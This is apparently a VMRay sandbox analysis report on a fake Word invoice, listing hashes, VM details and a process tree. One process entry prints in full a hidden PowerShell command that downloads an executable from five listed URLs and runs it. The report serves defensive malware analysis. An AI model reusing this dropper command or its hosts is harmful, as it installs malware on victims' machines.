Fake Microsoft Word Invoice Analysis | VMRay Analyzer Report
Try VMRay Analyzer
| Creation Time | 2017-07-18 15:48 (UTC+2) |
| VM Analysis Duration Time | 00:03:09 |
| Execution Successful |
|
| Sample Filename | dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc |
| Command Line Parameters |
|
| Prescript |
|
| Number of Processes | 4 |
| Termination Reason | Timeout |
| Download | Archive Function Logfile Generic Logfile PCAP STIX/CybOX |
|
VTI Score
100 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 15 |
| VTI Rule Type | Documents |
| The tags feature is only available in the fully licensed version of VMRay Analyzer. |
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0x974 | Analysis Target | Medium | winword.exe | "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" | |
| #2 | 0xa94 | Child Process | Medium | powershell.exe | powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} | #1 |
| #3 | 0xba0 | Child Process | Medium | 8162.exe | "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe" | #2 |
| #4 | 0xbb4 | Child Process | Medium | 8162.exe | "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe" | #3 |
| ID | #1964137 |
| MD5 Hash Value | 36ca9cea3648ef3da53f4b84fe9f6120 |
| SHA1 Hash Value | 10448125e344fb33a3a8ac10b2295abe02dc01b9 |
| SHA256 Hash Value | dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78 |
| Filename | dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc |
| File Size | 268.00 KB (274432 bytes) |
| File Type | Word Document |
| Analyzer Version | 2.1.0 |
| Analyzer Build Date | 2017-07-17 18:00 |
| Microsoft Word Version | 16.0.4266.1003 |
| Internet Explorer Version | 8.0.7601.17514 |
| Firefox Version | 39.0 |
| Java Version | 8.0.1010.13 |
| VM Name | win7_64_sp1-mso2016 |
| VM Architecture | x86 64-bit |
| VM OS | Windows 7 |
| VM Kernel Version | 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) |
